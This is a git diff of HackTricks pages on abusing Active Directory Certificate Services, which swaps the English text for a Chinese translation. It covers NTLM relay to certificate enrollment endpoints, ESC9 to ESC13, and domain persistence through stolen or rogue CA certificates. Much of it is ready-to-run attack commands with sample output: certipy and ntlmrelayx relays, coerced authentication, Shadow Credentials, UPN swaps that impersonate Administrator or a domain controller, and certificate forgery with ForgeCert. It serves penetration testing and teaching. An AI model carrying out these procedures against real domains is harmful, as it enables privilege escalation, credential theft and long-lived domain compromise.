+- **证书注册服务**（CES）、**证书注册策略**（CEP）Web 服务和**网络设备注册服务**（NDES）默认通过其授权 HTTP 头支持协商身份验证。协商身份验证**同时支持** Kerberos 和**NTLM**，允许攻击者在中继攻击期间**降级为 NTLM** 身份验证。尽管这些 web 服务默认启用 HTTPS，但仅靠 HTTPS**并不能保护免受 NTLM 中继攻击**。对于 HTTPS 服务，只有在 HTTPS 与通道绑定结合使用时，才能防止 NTLM 中继攻击。不幸的是，AD CS 在 IIS 上未激活身份验证的扩展保护，这是通道绑定所需的。
 
-A common **issue** with NTLM relay attacks is the **short duration of NTLM sessions** and the inability of the attacker to interact with services that **require NTLM signing**.
+NTLM 中继攻击的一个常见**问题**是**NTLM 会话的持续时间短**，攻击者无法与**需要 NTLM 签名**的服务进行交互。
 
-Nevertheless, this limitation is overcome by exploiting an NTLM relay attack to acquire a certificate for the user, as the certificate's validity period dictates the session's duration, and the certificate can be employed with services that **mandate NTLM signing**. For instructions on utilizing a stolen certificate, refer to:
+然而，通过利用 NTLM 中继攻击获取用户的证书，可以克服这一限制，因为证书的有效期决定了会话的持续时间，并且该证书可以与**要求 NTLM 签名**的服务一起使用。有关如何使用被盗证书的说明，请参见：
 
 {{#ref}}
 account-persistence.md
 {{#endref}}
 
-Another limitation of NTLM relay attacks is that **an attacker-controlled machine must be authenticated to by a victim account**. The attacker could either wait or attempt to **force** this authentication:
+NTLM 中继攻击的另一个限制是**攻击者控制的机器必须由受害者账户进行身份验证**。攻击者可以选择等待或尝试**强制**进行此身份验证：
 
 {{#ref}}
 ../printers-spooler-service-abuse.md
 {{#endref}}
 
-### **Abuse**
-
-[**Certify**](https://github.com/GhostPack/Certify)’s `cas` enumerates **enabled HTTP AD CS endpoints**:
+### **滥用**
 
+[**Certify**](https://github.com/GhostPack/Certify)的 `cas` 列举了**启用的 HTTP AD CS 端点**：
 ```
 Certify.exe cas
 ```
-
 <figure><img src="../../../images/image (72).png" alt=""><figcaption></figcaption></figure>
 
-The `msPKI-Enrollment-Servers` property is used by enterprise Certificate Authorities (CAs) to store Certificate Enrollment Service (CES) endpoints. These endpoints can be parsed and listed by utilizing the tool **Certutil.exe**:
-
+`msPKI-Enrollment-Servers` 属性由企业证书授权机构 (CAs) 用于存储证书注册服务 (CES) 端点。可以通过利用工具 **Certutil.exe** 解析和列出这些端点：
 ```
 certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
 ```
-
 <figure><img src="../../../images/image (757).png" alt=""><figcaption></figcaption></figure>
-
 ```powershell
 Import-Module PSPKI
 Get-CertificationAuthority | select Name,Enroll* | Format-List *
 ```
-
 <figure><img src="../../../images/image (940).png" alt=""><figcaption></figcaption></figure>
 
-#### Abuse with Certify
-
+#### 利用 Certify
 ```bash
 ## In the victim machine
 # Prepare to send traffic to the compromised machine 445 port to 445 in the attackers machine
@@ -429,13 +382,11 @@ proxychains ntlmrelayx.py -t http://<AC Server IP>/certsrv/certfnsh.asp -smb2sup
 # Force authentication from victim to compromised machine with port forwards
 execute-assembly C:\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe <victim> <compromised>
 ```
-
 #### Abuse with [Certipy](https://github.com/ly4k/Certipy)
 
-The request for a certificate is made by Certipy by default based on the template `Machine` or `User`, determined by whether the account name being relayed ends in `$`. The specification of an alternative template can be achieved through the use of the `-template` parameter.
-
-A technique like [PetitPotam](https://github.com/ly4k/PetitPotam) can then be employed to coerce authentication. When dealing with domain controllers, the specification of `-template DomainController` is required.
+默认情况下，Certipy 根据模板 `Machine` 或 `User` 发出证书请求，这取决于被中继的帐户名称是否以 `$` 结尾。可以通过使用 `-template` 参数来指定替代模板。
 
+然后可以使用像 [PetitPotam](https://github.com/ly4k/PetitPotam) 这样的技术来强制身份验证。在处理域控制器时，需要指定 `-template DomainController`。
 ```bash
 certipy relay -ca ca.corp.local
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
@@ -448,182 +399,146 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 [*] Saved certificate and private key to 'administrator.pfx'
 [*] Exiting...
 ```
-
 ## No Security Extension - ESC9 <a href="#id-5485" id="id-5485"></a>
 
-### Explanation
+### 解释
 
-The new value **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) for **`msPKI-Enrollment-Flag`**, referred to as ESC9, prevents the embedding of the **new `szOID_NTDS_CA_SECURITY_EXT` security extension** in a certificate. This flag becomes relevant when `StrongCertificateBindingEnforcement` is set to `1` (the default setting), which contrasts with a setting of `2`. Its relevance is heightened in scenarios where a weaker certificate mapping for Kerberos or Schannel might be exploited (as in ESC10), given that the absence of ESC9 would not alter the requirements.
+新的值 **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) 对于 **`msPKI-Enrollment-Flag`**，称为 ESC9，防止在证书中嵌入 **新的 `szOID_NTDS_CA_SECURITY_EXT` 安全扩展**。当 `StrongCertificateBindingEnforcement` 设置为 `1`（默认设置）时，该标志变得相关，这与设置为 `2` 相对。在可能被利用的情况下，例如 Kerberos 或 Schannel 的较弱证书映射（如 ESC10），其相关性更高，因为缺少 ESC9 不会改变要求。
 
-The conditions under which this flag's setting becomes significant include:
+该标志设置变得重要的条件包括：
 
-- `StrongCertificateBindingEnforcement` is not adjusted to `2` (with the default being `1`), or `CertificateMappingMethods` includes the `UPN` flag.
-- The certificate is marked with the `CT_FLAG_NO_SECURITY_EXTENSION` flag within the `msPKI-Enrollment-Flag` setting.
-- Any client authentication EKU is specified by the certificate.
-- `GenericWrite` permissions are available over any account to compromise another.
+- `StrongCertificateBindingEnforcement` 未调整为 `2`（默认为 `1`），或 `CertificateMappingMethods` 包含 `UPN` 标志。
+- 证书在 `msPKI-Enrollment-Flag` 设置中标记为 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
+- 证书指定了任何客户端身份验证 EKU。
+- 对任何帐户具有 `GenericWrite` 权限以妥协另一个帐户。
 
-### Abuse Scenario
+### 滥用场景
 
-Suppose `John@corp.local` holds `GenericWrite` permissions over `Jane@corp.local`, with the goal to compromise `Administrator@corp.local`. The `ESC9` certificate template, which `Jane@corp.local` is permitted to enroll in, is configured with the `CT_FLAG_NO_SECURITY_EXTENSION` flag in its `msPKI-Enrollment-Flag` setting.
-
-Initially, `Jane`'s hash is acquired using Shadow Credentials, thanks to `John`'s `GenericWrite`:
+假设 `John@corp.local` 对 `Jane@corp.local` 拥有 `GenericWrite` 权限，目标是妥协 `Administrator@corp.local`。`ESC9` 证书模板，`Jane@corp.local` 被允许注册，已在其 `msPKI-Enrollment-Flag` 设置中配置了 `CT_FLAG_NO_SECURITY_EXTENSION` 标志。
 
+最初，使用 Shadow Credentials 获取 `Jane` 的哈希，得益于 `John` 的 `GenericWrite`：
 ```bash
 certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane
 ```
-
-Subsequently, `Jane`'s `userPrincipalName` is modified to `Administrator`, purposely omitting the `@corp.local` domain part:
-
+随后，`Jane`的`userPrincipalName`被修改为`Administrator`，故意省略了`@corp.local`域部分：
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
 ```
+此修改不违反约束，因为 `Administrator@corp.local` 仍然作为 `Administrator` 的 `userPrincipalName` 而保持独特。
 
-This modification does not violate constraints, given that `Administrator@corp.local` remains distinct as `Administrator`'s `userPrincipalName`.
-
-Following this, the `ESC9` certificate template, marked vulnerable, is requested as `Jane`:
-
+接下来，标记为易受攻击的 `ESC9` 证书模板被请求为 `Jane`：
 ```bash
 certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9
 ```
+注意到证书的 `userPrincipalName` 反映了 `Administrator`，没有任何“对象 SID”。
 
-It's noted that the certificate's `userPrincipalName` reflects `Administrator`, devoid of any “object SID”.
-
-`Jane`'s `userPrincipalName` is then reverted to her original, `Jane@corp.local`:
-
+`Jane` 的 `userPrincipalName` 随后恢复为她的原始值 `Jane@corp.local`：
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
 ```
-
-Attempting authentication with the issued certificate now yields the NT hash of `Administrator@corp.local`. The command must include `-domain <domain>` due to the certificate's lack of domain specification:
-
+尝试使用已发放的证书进行身份验证现在会产生 `Administrator@corp.local` 的 NT 哈希。由于证书缺乏域规范，命令必须包括 `-domain <domain>`：
 ```bash
 certipy auth -pfx adminitrator.pfx -domain corp.local
 ```
+## 弱证书映射 - ESC10
 
-## Weak Certificate Mappings - ESC10
+### 解释
 
-### Explanation
+域控制器上的两个注册表项值被称为 ESC10：
 
-Two registry key values on the domain controller are referred to by ESC10:
+- `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel` 下 `CertificateMappingMethods` 的默认值为 `0x18` (`0x8 | 0x10`)，之前设置为 `0x1F`。
+- `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc` 下 `StrongCertificateBindingEnforcement` 的默认设置为 `1`，之前为 `0`。
 
-- The default value for `CertificateMappingMethods` under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel` is `0x18` (`0x8 | 0x10`), previously set to `0x1F`.
-- The default setting for `StrongCertificateBindingEnforcement` under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc` is `1`, previously `0`.
+**案例 1**
 
-**Case 1**
+当 `StrongCertificateBindingEnforcement` 配置为 `0`。
 
-When `StrongCertificateBindingEnforcement` is configured as `0`.
+**案例 2**
 
-**Case 2**
+如果 `CertificateMappingMethods` 包含 `UPN` 位 (`0x4`)。
 
-If `CertificateMappingMethods` includes the `UPN` bit (`0x4`).
+### 滥用案例 1
 
-### Abuse Case 1
+当 `StrongCertificateBindingEnforcement` 配置为 `0` 时，具有 `GenericWrite` 权限的账户 A 可以被利用来妥协任何账户 B。
 
-With `StrongCertificateBindingEnforcement` configured as `0`, an account A with `GenericWrite` permissions can be exploited to compromise any account B.
-
-For instance, having `GenericWrite` permissions over `Jane@corp.local`, an attacker aims to compromise `Administrator@corp.local`. The procedure mirrors ESC9, allowing any certificate template to be utilized.
-
-Initially, `Jane`'s hash is retrieved using Shadow Credentials, exploiting the `GenericWrite`.
+例如，拥有 `Jane@corp.local` 的 `GenericWrite` 权限，攻击者旨在妥协 `Administrator@corp.local`。该过程与 ESC9 相似，允许使用任何证书模板。
 
+最初，使用 Shadow Credentials 获取 `Jane` 的哈希，利用 `GenericWrite`。
 ```bash
 certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane
 ```
-
-Subsequently, `Jane`'s `userPrincipalName` is altered to `Administrator`, deliberately omitting the `@corp.local` portion to avoid a constraint violation.
-
+随后，`Jane`的`userPrincipalName`被更改为`Administrator`，故意省略`@corp.local`部分以避免约束冲突。
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
 ```
-
-Following this, a certificate enabling client authentication is requested as `Jane`, using the default `User` template.
-
+接下来，作为 `Jane` 请求一个启用客户端身份验证的证书，使用默认的 `User` 模板。
 ```bash
 certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
 ```
-
-`Jane`'s `userPrincipalName` is then reverted to its original, `Jane@corp.local`.
-
+`Jane`的`userPrincipalName`随后恢复为其原始值`Jane@corp.local`。
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
 ```
-
-Authenticating with the obtained certificate will yield the NT hash of `Administrator@corp.local`, necessitating the specification of the domain in the command due to the absence of domain details in the certificate.
-
+使用获得的证书进行身份验证将产生 `Administrator@corp.local` 的 NT 哈希，因此由于证书中缺少域详细信息，命令中需要指定域。
 ```bash
 certipy auth -pfx administrator.pfx -domain corp.local
 ```
-
 ### Abuse Case 2
 
-With the `CertificateMappingMethods` containing the `UPN` bit flag (`0x4`), an account A with `GenericWrite` permissions can compromise any account B lacking a `userPrincipalName` property, including machine accounts and the built-in domain administrator `Administrator`.
-
-Here, the goal is to compromise `DC$@corp.local`, starting with obtaining `Jane`'s hash through Shadow Credentials, leveraging the `GenericWrite`.
+在 `CertificateMappingMethods` 包含 `UPN` 位标志 (`0x4`) 的情况下，具有 `GenericWrite` 权限的账户 A 可以破坏任何缺少 `userPrincipalName` 属性的账户 B，包括计算机账户和内置域管理员 `Administrator`。
 
+在这里，目标是破坏 `DC$@corp.local`，首先通过 Shadow Credentials 获取 `Jane` 的哈希，利用 `GenericWrite`。
 ```bash
 certipy shadow auto -username John@corp.local -p Passw0rd! -account Jane
 ```
-
-`Jane`'s `userPrincipalName` is then set to `DC$@corp.local`.
-
+`Jane`的`userPrincipalName`被设置为`DC$@corp.local`。
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'DC$@corp.local'
 ```
-
-A certificate for client authentication is requested as `Jane` using the default `User` template.
-
+作为 `Jane` 请求客户端身份验证的证书，使用默认的 `User` 模板。
 ```bash
 certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
 ```
-
-`Jane`'s `userPrincipalName` is reverted to its original after this process.
-
+`Jane`的`userPrincipalName`在此过程后恢复为其原始值。
 ```bash
 certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'Jane@corp.local'
 ```
-
-To authenticate via Schannel, Certipy’s `-ldap-shell` option is utilized, indicating authentication success as `u:CORP\DC$`.
-
+通过 Schannel 进行身份验证时，使用 Certipy 的 `-ldap-shell` 选项，表示身份验证成功为 `u:CORP\DC$`。
 ```bash
 certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
 ```
-
-Through the LDAP shell, commands such as `set_rbcd` enable Resource-Based Constrained Delegation (RBCD) attacks, potentially compromising the domain controller.
-
+通过LDAP shell，命令如`set_rbcd`使资源基础约束委派（RBCD）攻击成为可能，从而可能危及域控制器。
 ```bash
 certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
 ```
-
-This vulnerability also extends to any user account lacking a `userPrincipalName` or where it does not match the `sAMAccountName`, with the default `Administrator@corp.local` being a prime target due to its elevated LDAP privileges and the absence of a `userPrincipalName` by default.
+此漏洞还扩展到任何缺少 `userPrincipalName` 的用户帐户或其与 `sAMAccountName` 不匹配的帐户，默认的 `Administrator@corp.local` 是一个主要目标，因为它具有提升的 LDAP 权限，并且默认情况下缺少 `userPrincipalName`。
 
 ## Relaying NTLM to ICPR - ESC11
 
-### Explanation
+### 解释
 
-If CA Server Do not configured with `IF_ENFORCEENCRYPTICERTREQUEST`, it can be makes NTLM relay attacks without signing via RPC service. [Reference in here](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/).
-
-You can use `certipy` to enumerate if `Enforce Encryption for Requests` is Disabled and certipy will show `ESC11` Vulnerabilities.
+如果 CA 服务器未配置 `IF_ENFORCEENCRYPTICERTREQUEST`，则可以通过 RPC 服务进行未签名的 NTLM 中继攻击。[参考在这里](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)。
 
+您可以使用 `certipy` 来枚举 `Enforce Encryption for Requests` 是否被禁用，certipy 将显示 `ESC11` 漏洞。
 ```bash
 $ certipy find -u mane@domain.local -p 'password' -dc-ip 192.168.100.100 -stdout
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
 
 Certificate Authorities
-  0
-    CA Name                             : DC01-CA
-    DNS Name                            : DC01.domain.local
-    Certificate Subject                 : CN=DC01-CA, DC=domain, DC=local
-    ....
-    Enforce Encryption for Requests     : Disabled
-    ....
-    [!] Vulnerabilities
-      ESC11                             : Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
+0
+CA Name                             : DC01-CA
+DNS Name                            : DC01.domain.local
+Certificate Subject                 : CN=DC01-CA, DC=domain, DC=local
+....
+Enforce Encryption for Requests     : Disabled
+....
+[!] Vulnerabilities
+ESC11                             : Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
 
 ```
+### 滥用场景
 
-### Abuse Scenario
-
-It need to setup a relay server:
-
+需要设置一个中继服务器：
 ```bash
 $ certipy relay -target 'rpc://DC01.domain.local' -ca 'DC01-CA' -dc-ip 192.168.100.100
 Certipy v4.7.0 - by Oliver Lyak (ly4k)
@@ -642,33 +557,29 @@ Certipy v4.7.0 - by Oliver Lyak (ly4k)
 [*] Saved certificate and private key to 'administrator.pfx'
 [*] Exiting...
 ```
+注意：对于域控制器，我们必须在 DomainController 中指定 `-template`。
 
-Note: For domain controllers, we must specify `-template` in DomainController.
-
-Or using [sploutchy's fork of impacket](https://github.com/sploutchy/impacket) :
-
+或者使用 [sploutchy's fork of impacket](https://github.com/sploutchy/impacket)：
 ```bash
 $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -smb2support
 ```
-
 ## Shell access to ADCS CA with YubiHSM - ESC12
 
 ### Explanation
 
-Administrators can set up the Certificate Authority to store it on an external device like the "Yubico YubiHSM2".
+管理员可以设置证书颁发机构，将其存储在外部设备上，如“Yubico YubiHSM2”。
 
-If USB device connected to the CA server via a USB port, or a USB device server in case of the CA server is a virtual machine, an authentication key (sometimes referred to as a "password") is required for the Key Storage Provider to generate and utilize keys in the YubiHSM.
+如果USB设备通过USB端口连接到CA服务器，或者在CA服务器是虚拟机的情况下连接到USB设备服务器，则需要一个身份验证密钥（有时称为“密码”），以便密钥存储提供程序生成和使用YubiHSM中的密钥。
 
-This key/password is stored in the registry under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` in cleartext.
+此密钥/密码以明文形式存储在注册表中，路径为`HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`。
 
-Reference in [here](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm).
+参考[这里](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)。
 
 ### Abuse Scenario
 
-If the CA's private key stored on a physical USB device when you got a shell access, it is possible to recover the key.
-
-In first, you need to obtain the CA certificate (this is public) and then:
+如果CA的私钥存储在物理USB设备上，当你获得shell访问时，可以恢复该密钥。
 
+首先，你需要获取CA证书（这是公开的），然后：
 ```cmd
 # import it to the user store with CA certificate
 $ certutil -addstore -user my <CA certificate file>
@@ -676,19 +587,17 @@ $ certutil -addstore -user my <CA certificate file>
 # Associated with the private key in the YubiHSM2 device
 $ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common Name>
 ```
+最后，使用 certutil `-sign` 命令利用 CA 证书及其私钥伪造一个新的任意证书。
 
-Finally, use the certutil `-sign` command to forge a new arbitrary certificate using the CA certificate and its private key.
+## OID 组链接滥用 - ESC13
 
-## OID Group Link Abuse - ESC13
+### 解释
 
-### Explanation
+`msPKI-Certificate-Policy` 属性允许将发行政策添加到证书模板中。负责发行政策的 `msPKI-Enterprise-Oid` 对象可以在 PKI OID 容器的配置命名上下文 (CN=OID,CN=Public Key Services,CN=Services) 中发现。可以使用该对象的 `msDS-OIDToGroupLink` 属性将政策链接到 AD 组，从而使系统能够授权一个用户，前提是他出示的证书使他看起来像是该组的成员。[参考链接](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)。
 
-The `msPKI-Certificate-Policy` attribute allows the issuance policy to be added to the certificate template. The `msPKI-Enterprise-Oid` objects that are responsible for issuing policies can be discovered in the Configuration Naming Context (CN=OID,CN=Public Key Services,CN=Services) of the PKI OID container. A policy can be linked to an AD group using this object's `msDS-OIDToGroupLink` attribute, enabling a system to authorize a user who presents the certificate as though he were a member of the group. [Reference in here](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53).
-
-In other words, when a user has permission to enroll a certificate and the certificate is link to an OID group, the user can inherit the privileges of this group.
-
-Use [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) to find OIDToGroupLink:
+换句话说，当用户有权申请证书且该证书链接到 OID 组时，用户可以继承该组的权限。
 
+使用 [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) 查找 OIDToGroupLink：
 ```powershell
 Enumerating OIDs
 ------------------------
@@ -710,35 +619,31 @@ OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.3025710.4393146.2181807.139243
 OID msDS-OIDToGroupLink: CN=VulnerableGroup,CN=Users,DC=domain,DC=local
 ------------------------
 ```
+### 滥用场景
 
-### Abuse Scenario
+找到一个用户权限，可以使用 `certipy find` 或 `Certify.exe find /showAllPermissions`。
 
-Find a user permission it can use `certipy find` or `Certify.exe find /showAllPermissions`.
-
-If `John` have have permission to enroll `VulnerableTemplate`, the user can inherit the privileges of `VulnerableGroup` group.
-
-All it need to do just specify the template, it will get a certificate with OIDToGroupLink rights.
+如果 `John` 有权限注册 `VulnerableTemplate`，则该用户可以继承 `VulnerableGroup` 组的权限。
 
+所需的只是指定模板，它将获得具有 OIDToGroupLink 权限的证书。
 ```bash
 certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target "DC01.domain.local" -ca 'DC01-CA' -template 'VulnerableTemplate'
 ```
+## 用被动语态解释的证书妥协森林
 
-## Compromising Forests with Certificates Explained in Passive Voice
+### 被妥协的CA破坏森林信任
 
-### Breaking of Forest Trusts by Compromised CAs
+**跨森林注册**的配置相对简单。资源森林的**根CA证书**由管理员**发布到账户森林**，资源森林的**企业CA**证书被**添加到每个账户森林中的`NTAuthCertificates`和AIA容器**。为了澄清，这种安排赋予了**资源森林中的CA对其管理的所有其他森林的完全控制**。如果该CA被**攻击者妥协**，则资源森林和账户森林中所有用户的证书都可能被**伪造**，从而打破森林的安全边界。
 
-The configuration for **cross-forest enrollment** is made relatively straightforward. The **root CA certificate** from the resource forest is **published to the account forests** by administrators, and the **enterprise CA** certificates from the resource forest are **added to the `NTAuthCertificates` and AIA containers in each account forest**. To clarify, this arrangement grants the **CA in the resource forest complete control** over all other forests for which it manages PKI. Should this CA be **compromised by attackers**, certificates for all users in both the resource and account forests could be **forged by them**, thereby breaking the security boundary of the forest.
+### 授予外部主体的注册权限
 
-### Enrollment Privileges Granted to Foreign Principals
+在多森林环境中，必须谨慎对待**发布证书模板**的企业CA，这些模板允许**经过身份验证的用户或外部主体**（属于企业CA所属森林的外部用户/组）**注册和编辑权限**。\
+在信任关系中进行身份验证后，**经过身份验证的用户SID**会被AD添加到用户的令牌中。因此，如果一个域拥有一个允许**经过身份验证的用户注册权限**的企业CA，则来自不同森林的用户可能会**注册该模板**。同样，如果**模板明确授予外部主体注册权限**，则**跨森林访问控制关系由此创建**，使得一个森林中的主体能够**注册另一个森林中的模板**。
 
-In multi-forest environments, caution is required concerning Enterprise CAs that **publish certificate templates** which allow **Authenticated Users or foreign principals** (users/groups external to the forest to which the Enterprise CA belongs) **enrollment and edit rights**.\
-Upon authentication across a trust, the **Authenticated Users SID** is added to the user’s token by AD. Thus, if a domain possesses an Enterprise CA with a template that **allows Authenticated Users enrollment rights**, a template could potentially be **enrolled in by a user from a different forest**. Likewise, if **enrollment rights are explicitly granted to a foreign principal by a template**, a **cross-forest access-control relationship is thereby created**, enabling a principal from one forest to **enroll in a template from another forest**.
-
-Both scenarios lead to an **increase in the attack surface** from one forest to another. The settings of the certificate template could be exploited by an attacker to obtain additional privileges in a foreign domain.
+这两种情况都会导致**攻击面从一个森林增加到另一个森林**。攻击者可以利用证书模板的设置在外部域中获得额外权限。
 
 <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
index db5b40f9a..2860e7a3a 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -2,29 +2,26 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**This is a summary of the domain persistence techniques shared in [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Check it for further details.
+**这是在 [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) 中分享的域持久性技术的摘要**。请查看以获取更多详细信息。
 
-## Forging Certificates with Stolen CA Certificates - DPERSIST1
+## 使用被盗 CA 证书伪造证书 - DPERSIST1
 
-How can you tell that a certificate is a CA certificate?
+如何判断一个证书是 CA 证书？
 
-It can be determined that a certificate is a CA certificate if several conditions are met:
+如果满足以下几个条件，可以确定一个证书是 CA 证书：
 
-- The certificate is stored on the CA server, with its private key secured by the machine's DPAPI, or by hardware such as a TPM/HSM if the operating system supports it.
-- Both the Issuer and Subject fields of the certificate match the distinguished name of the CA.
-- A "CA Version" extension is present in the CA certificates exclusively.
-- The certificate lacks Extended Key Usage (EKU) fields.
+- 证书存储在 CA 服务器上，其私钥由机器的 DPAPI 保护，或者由操作系统支持的硬件（如 TPM/HSM）保护。
+- 证书的颁发者和主题字段与 CA 的区分名称匹配。
+- CA 证书中独有的存在“CA 版本”扩展。
+- 证书缺少扩展密钥使用 (EKU) 字段。
 
-To extract the private key of this certificate, the `certsrv.msc` tool on the CA server is the supported method via the built-in GUI. Nonetheless, this certificate does not differ from others stored within the system; thus, methods such as the [THEFT2 technique](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) can be applied for extraction.
-
-The certificate and private key can also be obtained using Certipy with the following command:
+要提取此证书的私钥，可以通过 CA 服务器上的 `certsrv.msc` 工具使用内置 GUI 进行支持的方法。然而，这个证书与系统中存储的其他证书没有区别，因此可以应用 [THEFT2 技术](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) 进行提取。
 
+证书和私钥也可以使用 Certipy 通过以下命令获得：
 ```bash
 certipy ca 'corp.local/administrator@ca.corp.local' -hashes :123123.. -backup
 ```
-
-Upon acquiring the CA certificate and its private key in `.pfx` format, tools like [ForgeCert](https://github.com/GhostPack/ForgeCert) can be utilized to generate valid certificates:
-
+在获取 `.pfx` 格式的 CA 证书及其私钥后，可以使用像 [ForgeCert](https://github.com/GhostPack/ForgeCert) 这样的工具生成有效的证书：
 ```bash
 # Generating a new certificate with ForgeCert
 ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123! --Subject "CN=User" --SubjectAltName localadmin@theshire.local --NewCertPath localadmin.pfx --NewCertPassword Password123!
@@ -38,31 +35,29 @@ Rubeus.exe asktgt /user:localdomain /certificate:C:\ForgeCert\localadmin.pfx /pa
 # Authenticating using the new certificate with certipy
 certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
 ```
-
 > [!WARNING]
-> The user targeted for certificate forgery must be active and capable of authenticating in Active Directory for the process to succeed. Forging a certificate for special accounts like krbtgt is ineffective.
+> 目标用户必须处于活动状态并能够在Active Directory中进行身份验证，以使证书伪造过程成功。伪造像krbtgt这样的特殊账户的证书是无效的。
 
-This forged certificate will be **valid** until the end date specified and as **long as the root CA certificate is valid** (usually from 5 to **10+ years**). It's also valid for **machines**, so combined with **S4U2Self**, an attacker can **maintain persistence on any domain machine** for as long as the CA certificate is valid.\
-Moreover, the **certificates generated** with this method **cannot be revoked** as CA is not aware of them.
+此伪造证书将**有效**直到指定的结束日期，并且**只要根CA证书有效**（通常为5到**10年以上**）。它对**机器**也是有效的，因此结合**S4U2Self**，攻击者可以**在任何域机器上保持持久性**，只要CA证书有效。\
+此外，使用此方法**生成的证书**是**无法被撤销**的，因为CA并不知道它们的存在。
 
-## Trusting Rogue CA Certificates - DPERSIST2
+## 信任恶意CA证书 - DPERSIST2
 
-The `NTAuthCertificates` object is defined to contain one or more **CA certificates** within its `cacertificate` attribute, which Active Directory (AD) utilizes. The verification process by the **domain controller** involves checking the `NTAuthCertificates` object for an entry matching the **CA specified** in the Issuer field of the authenticating **certificate**. Authentication proceeds if a match is found.
+`NTAuthCertificates`对象被定义为包含一个或多个**CA证书**，这些证书在其`cacertificate`属性中，Active Directory (AD) 使用该属性。**域控制器**的验证过程涉及检查`NTAuthCertificates`对象中是否有与身份验证**证书**的发行者字段中指定的**CA**匹配的条目。如果找到匹配项，则继续进行身份验证。
 
-A self-signed CA certificate can be added to the `NTAuthCertificates` object by an attacker, provided they have control over this AD object. Normally, only members of the **Enterprise Admin** group, along with **Domain Admins** or **Administrators** in the **forest root’s domain**, are granted permission to modify this object. They can edit the `NTAuthCertificates` object using `certutil.exe` with the command `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA126`, or by employing the [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
+攻击者可以将自签名CA证书添加到`NTAuthCertificates`对象中，前提是他们控制此AD对象。通常，只有**企业管理员**组的成员，以及**域管理员**或**森林根域**中的**管理员**，才被授予修改此对象的权限。他们可以使用`certutil.exe`通过命令`certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA126`编辑`NTAuthCertificates`对象，或者使用[**PKI健康工具**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool)。
 
-This capability is especially relevant when used in conjunction with a previously outlined method involving ForgeCert to dynamically generate certificates.
+此功能在与之前概述的涉及ForgeCert动态生成证书的方法结合使用时尤其相关。
 
-## Malicious Misconfiguration - DPERSIST3
+## 恶意错误配置 - DPERSIST3
 
